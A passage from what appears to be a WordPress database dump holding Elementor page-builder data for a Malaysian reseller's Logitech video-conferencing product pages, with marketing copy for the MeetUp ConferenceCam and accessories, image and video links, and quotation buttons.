Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"08edb2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"85c2829\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-screen-share.png\",\"id\":1391}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f3f660b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech Screen Share<\\/h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"77dadd4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b20ef35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3211191\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-expansion-microphones.png\",\"id\":1392}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2a65808\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP EXPANSION MICS<\\/h3><p>Add-on mics for larger groups<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6a71d0d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac7c83c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6834a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"13a33a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5b6e717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech SmartDock Flex<\\/h3><p>Expansion Kit for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5014200\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"366eb59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dc59d5f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-15m-extended-cable.png\",\"id\":1401}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e222e61\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 15M EXTENDED CABLE<\\/h3><p>15 meter cable for video conferences in larger rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b6bbdef\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b7c0191\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8128e7a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-10m-extended-cable.png\",\"id\":1404}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a506052\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 10M EXTENDED CABLE<\\/h3><p>10 meter cable, ideal for large conference rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"da882ae\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"509c931\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2438d41\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f231a38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bc953c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-expansion-mics.png\",\"id\":1406}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"db20012\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EXPANSION MIC FOR MEETUP<\\/h3><p>Add-on microphone for huddle room flexibility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"33673e4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"cfcc955\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5592,2953,'_wp_page_template','template-fullwidth.php'),(5593,2953,'_elementor_edit_mode','builder'),(5572,2950,'_elementor_edit_mode','builder'),(5573,2950,'_elementor_template_type','post'),(5574,2950,'_wp_page_template','default'),(5575,2950,'_elementor_data','[{\"id\":\"00be070\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"84682c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0a77ac1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>MEETUP<\\/h2><p>All-in-One ConferenceCam with an extra-wide field of view and integrated audio, perfect for small conference and huddle rooms<\\/p><ul><li>See everyone, even those close to the camera<\\/li><li>RightSense\\u2122 Technologies with automatic framing<\\/li><li>Compact design minimizes cabling and clutter<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"03b6797\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"963c473\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f3383c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39a9a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fd44a2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>PERFECT FOR SMALL ROOMS<\\/h2><p>MeetUp is Logitech\\u2019s premier ConferenceCam designed for small conference rooms and huddle rooms. Stop crowding around laptops. With an extra wide field of view, motorized lens and rightsight\\u2122 auto framing plus a pan\\/tilt lens, MeetUp makes every seat at the table clearly visible. With integrated audio optimized for huddle room acoustics, everyone can be heard as well as seen.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a1e6e4a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"93a8ede\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f333ba6\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/tD_tmRMN2OA\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"65c40a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a6e2b9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>A WIDE VIEW FOR TIGHT SPACES<\\/h3><p>Logitech\\u00ae MeetUp brings remarkable video quality to small conference rooms. Its extra wide field-of-view easily accommodates huddle rooms where people sit on either side of the camera. The 4K ultra high-def sensor and Logitech lens deliver extra sharp clarity, while pan, tilt, and zoom controls let you focus on presenters and their visual aids.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a3562e7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4fd72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2c46c3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>HEARING IS BELIEVING<\\/h3><p>Housed within a patent-pending anti-vibration enclosure, three beamforming mics MeetUp\\u2019s integrated audio is optimized for huddle room acoustics, delivering exceptional sound in small rooms. Three beamforming mics and a custom-tuned speaker ensure meetings sound as great as they look. Add Expansion Mic for MeetUp to extend the audio range up to 4.2 meters.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"679bfe0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6a0541c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam.jpg\",\"id\":2930}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d325f5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ce92ebf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1e20686\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/CqeUIzYth_w\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"f858b37\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fcf3b26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>AS EASY AS PLUG AND PLAY<\\/h3><p>Step into a huddle room and instantly start a video collaboration. Whether it is Video conferencing, recording, or broadcasting applications that support USB cameras MeetUp simply works.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5350d12\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"939cb8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6523bac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DESIGNED FOR THE WAY PEOPLE MEET<\\/h3><p>Small conference rooms are growing in popularity, and MeetUp rises to the challenge. It provides superb resolution, color balance, detail, and audio in tight spaces. With the included wall mount and compact design that minimizes cable clutter, MeetUp optimizes the huddle room experience.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"544ff47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6da856b\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/4xwIpyv3KOs\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19d44ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e256d3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"51124da\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":2932,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam-3.jpg\"},{\"id\":2933,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam-2.jpg\"},{\"id\":2934,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam-1.jpg\"}],\"thumbnail_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"9e2b2c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9f49a3c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EXTRAS PROVIDE MORE CONVENIENCE<\\/h3><p>Our free mobile app (available on Google Play and iTunes) turns your smartphone or tablet into a remote control for MeetUp. Add accessories such as the Logitech Expansion Mic and TV Mount for different room sizes and configurations. Order replacement parts if needed to keep everything up and running.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7bfe2ba\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3d69037\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"937331b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>5X ZOOM<\\/h4><p>Perfectly frame presenters to minimize background distractions. Zoom in on whiteboards and objects so remote participants can see what you see. Thanks to its advanced 4K image sensor, video remains sharp and clear, even when you zoom in on the details.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eed4149\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7519127\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PREMIUM CAMERA OPTICS<\\/h4><p>MeetUp features exquisitely engineered, premium camera optics that capture a wide field-of-view without distorting faces and furniture with a \\u201cfisheye\\u201d effect. Faces look natural, whiteboard writing remains legible, and straight lines stay straight.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d707460\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5f5fe8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EXPANSION MIC-READY<\\/h4><p>Logitech Expansion Mic for MeetUp provides greater flexibility in huddle room configurations. MeetUp\\u2019s built-in beamforming mics are optimized for up to 8 feet (2.4 meters). To extend that range up to 14 feet (4.2 meters), add an Expansion Mic. So whether people are seated at a table, sitting against the wall, or walking around the room, Expansion Mic for MeetUp means everyone will be heard.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ea6e88\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a43dc18\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>MeetUp offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business and ready for Teams, Microsoft Cortana\\u00ae, Cisco Jabber\\u2122 compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo,Fuze and Zoom. If your preferred application can recognize a webcam, you can use it with MeetUp.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0264c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"05c50ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0569406\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>BLUETOOTH\\u00ae SPEAKERPHONE<\\/h4><p>Already connected on your smartphone? Dialing into an audio conference? Pair MeetUp with your smartphone or tablet to enjoy outstanding audio clarity, volume, and range that handheld devices can\\u2019t match.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"83af3f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8d354cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>TAKE CONTROL<\\/h4><p>MeetUp gives you two ways to aim the camera, zoom in and out, set and recall presets, and manage volume and mute. The included remote control uses radio frequency (RF) signals for reliable and discrete control from anywhere in the room. Or, download the free Logi Remote app (available on Google Play and iTunes to control MeetUp with a smartphone or tablet.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dec4b8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8f69f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>VERSATILE TV MOUNT<\\/h4><p>Logitech TV Mount for MeetUp lets you mount the MeetUp ConferenceCam either above or below a flat-panel monitor, and attaches to the industry-standard VESA mounting points available on most TVs and monitors.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9173c99\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4e17717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>RIGHTSENSE<\\/h4><p>Logitech RightSense\\u2122 proactive technologies make better video meetings easy and automatic.H\\u00ae RightSound optimizes the human voice and enhances conversational clarity, RightSight automatically moves the camera and adjusts the zoom so no one gets left out of the picture, and RightLight helps everyone look their best on camera, regardless of lighting conditions. With RightSense on board, video meetings are naturally more beautiful and efficient with no calibration, manual intervention or support required.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5576,2950,'_elementor_version','0.4'),(5635,2960,'_wp_page_template','template-fullwidth.php'),(5636,2960,'_elementor_data','[{\"id\":\"00be070\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"84682c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0a77ac1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>MEETUP<\\/h2><p>All-in-One ConferenceCam with an extra-wide field of view and integrated audio, perfect for small conference and huddle rooms<\\/p><ul><li>See everyone, even those close to the camera<\\/li><li>RightSense\\u2122 Technologies with automatic framing<\\/li><li>Compact design minimizes cabling and clutter<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"03b6797\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"963c473\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f3383c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39a9a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fd44a2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>PERFECT FOR SMALL ROOMS<\\/h2><p>MeetUp is Logitech\\u2019s premier ConferenceCam designed for small conference rooms and huddle rooms. Stop crowding around laptops. With an extra wide field of view, motorized lens and rightsight\\u2122 auto framing plus a pan\\/tilt lens, MeetUp makes every seat at the table clearly visible. With integrated audio optimized for huddle room acoustics, everyone can be heard as well as seen.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a1e6e4a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"93a8ede\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f333ba6\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/tD_tmRMN2OA\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"65c40a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a6e2b9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>A WIDE VIEW FOR TIGHT SPACES<\\/h3><p>Logitech\\u00ae MeetUp brings remarkable video quality to small conference rooms. Its extra wide field-of-view easily accommodates huddle rooms where people sit on either side of the camera. The 4K ultra high-def sensor and Logitech lens deliver extra sharp clarity, while pan, tilt, and zoom controls let you focus on presenters and their visual aids.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a3562e7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4fd72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2c46c3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>HEARING IS BELIEVING<\\/h3><p>Housed within a patent-pending anti-vibration enclosure, three beamforming mics MeetUp\\u2019s integrated audio is optimized for huddle room acoustics, delivering exceptional sound in small rooms. Three beamforming mics and a custom-tuned speaker ensure meetings sound as great as they look. Add Expansion Mic for MeetUp to extend the audio range up to 4.2 meters.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"679bfe0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6a0541c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam.jpg\",\"id\":2930}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d325f5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ce92ebf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1e20686\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/CqeUIzYth_w\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"f858b37\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fcf3b26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>AS EASY AS PLUG AND PLAY<\\/h3><p>Step into a huddle room and instantly start a video collaboration. Whether it is Video conferencing, recording, or broadcasting applications that support USB cameras MeetUp simply works.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5350d12\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"939cb8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6523bac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DESIGNED FOR THE WAY PEOPLE MEET<\\/h3><p>Small conference rooms are growing in popularity, and MeetUp rises to the challenge. It provides superb resolution, color balance, detail, and audio in tight spaces. With the included wall mount and compact design that minimizes cable clutter, MeetUp optimizes the huddle room experience.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"544ff47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6da856b\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/4xwIpyv3KOs\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19d44ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e256d3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7f589de\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":2930,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam.jpg\"},{\"id\":2932,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam-3.jpg\"},{\"id\":2933,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam-2.jpg\"}],\"thumbnail_size\":\"medium\",\"gallery_columns\":\"3\",\"open_lightbox\":\"yes\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false},{\"id\":\"9e2b2c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9f49a3c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EXTRAS PROVIDE MORE CONVENIENCE<\\/h3><p>Our free mobile app (available on Google Play and iTunes) turns your smartphone or tablet into a remote control for MeetUp. Add accessories such as the Logitech Expansion Mic and TV Mount for different room sizes and configurations. Order replacement parts if needed to keep everything up and running.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7bfe2ba\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3d69037\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"937331b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>5X ZOOM<\\/h4><p>Perfectly frame presenters to minimize background distractions. Zoom in on whiteboards and objects so remote participants can see what you see. Thanks to its advanced 4K image sensor, video remains sharp and clear, even when you zoom in on the details.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eed4149\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7519127\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PREMIUM CAMERA OPTICS<\\/h4><p>MeetUp features exquisitely engineered, premium camera optics that capture a wide field-of-view without distorting faces and furniture with a \\u201cfisheye\\u201d effect. Faces look natural, whiteboard writing remains legible, and straight lines stay straight.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d707460\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5f5fe8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EXPANSION MIC-READY<\\/h4><p>Logitech Expansion Mic for MeetUp provides greater flexibility in huddle room configurations. MeetUp\\u2019s built-in beamforming mics are optimized for up to 8 feet (2.4 meters). To extend that range up to 14 feet (4.2 